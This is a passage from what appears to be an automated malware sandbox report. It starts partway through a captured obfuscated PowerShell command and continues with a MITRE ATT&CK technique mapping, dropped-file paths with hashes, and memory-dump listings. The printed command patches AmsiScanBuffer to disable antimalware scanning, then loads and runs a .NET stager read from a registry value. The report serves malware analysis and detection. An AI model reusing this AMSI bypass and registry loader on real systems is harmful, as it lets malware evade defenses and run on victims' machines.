Invoke($Null,@([Object]$lghGHER,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+'an'+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$rsNcrnwJbl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rSZfrEUlGfVZKdvgP,$qYIRodchQXoKJZsRRYDRlQ).Invoke($dHgbGMOnksJAOHjBN,[uint32]8,4,[ref]$rsNcrnwJbl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dHgbGMOnksJAOHjBN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rSZfrEUlGfVZKdvgP,$qYIRodchQXoKJZsRRYDRlQ).Invoke($dHgbGMOnksJAOHjBN,[uint32]8,0x20,[ref]$rsNcrnwJbl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+'e'+[Char](114)+'stag'+'e'+'r')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:5004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
18ba63596e025395968887cc5b2511af

SHA1
1411b60289b10483662dfd7d87246e2235094043

SHA256
331f64a8394402d332b5b411c268d339dbc832bd1e0951c75483920744f689df

SHA512
fd6f69faaa5023a534a40ff406682a39ec9d4f59da1225d753b5869350182b3d468d1bc09d9130dbb4f28c3461ae60211f085412a66d6f9c34d50ec024277eaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bgqnfhkz.aye.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1748-58-0x00007FF699140000-0x00007FF699169000-memory.dmp

Filesize
164KB

Download
memory/2224-44-0x00000232B3FD0000-0x00000232B3FE0000-memory.dmp

Filesize
64KB

Download
memory/2224-55-0x00000232B3FD0000-0x00000232B3FE0000-memory.dmp

Filesize
64KB

Download
memory/2224-43-0x00007FFF6BFA0000-0x00007FFF6CA61000-memory.dmp

Filesize
10.8MB

Download
memory/2224-57-0x00007FFF6BFA0000-0x00007FFF6CA61000-memory.dmp

Filesize
10.8MB

Download
memory/2488-39-0x00007FFF6BFA0000-0x00007FFF6CA61000-memory.dmp

Filesize
10.8MB

Download
memory/2488-37-0x000002309D710000-0x000002309D720000-memory.dmp

Filesize
64KB

Download
memory/2488-23-0x00007FFF6BFA0000-0x00007FFF6CA61000-memory.dmp

Filesize
10.8MB

Download
memory/2488-24-0x000002309D710000-0x000002309D720000-memory.dmp

Filesize
64KB

Download
memory/2488-25-0x000002309D710000-0x000002309D720000-memory.dmp

Filesize
64KB

Download
memory/2488-36-0x000002309D710000-0x000002309D720000-memory.dmp

Filesize
64KB

Download
memory/2524-15-0x00007FFF6BFA0000-0x00007FFF6CA61000-memory.dmp

Filesize
10.8MB

Download
memory/2524-20-0x00007FFF6BFA0000-0x00007FFF6CA61000-memory.dmp

Filesize
10.8MB

Download
memory/2524-17-0x000002114D440000-0x000002114D450000-memory.dmp

Filesize
64KB

Download
memory/2524-16-0x000002114D440000-0x000002114D450000-memory.dmp

Filesize
64KB

Download
memory/2524-5-0x0000021134F10000-0x0000021134F32000-memory.dmp

Filesize
136KB

Download
memory/2708-42-0x0000000140000000-0x0000000140DB1000-memory.dmp

Filesize
13.7MB

Download
memory/2708-0-0x00007FFF8B7B0000-0x00007FFF8B7B2000-memory.dmp

Filesize
8KB

Download
memory/2708-4-0x0000000140000000-0x0000000140DB1000-memory.dmp

Filesize
13.7MB

Download
memory/2708-1-0x0000000140000000-0x0000000140DB1000-memory.dmp

Filesize
13.7MB

Download
memory/2708-2-0x0000000140000000-0x0000000140DB1000-memory.dmp

Filesize
13.7MB

Download
memory/5004-59-0x00007FFF6BC20000-0x00007FFF6C6E1000-memory.dmp

Filesize
10.8MB

Download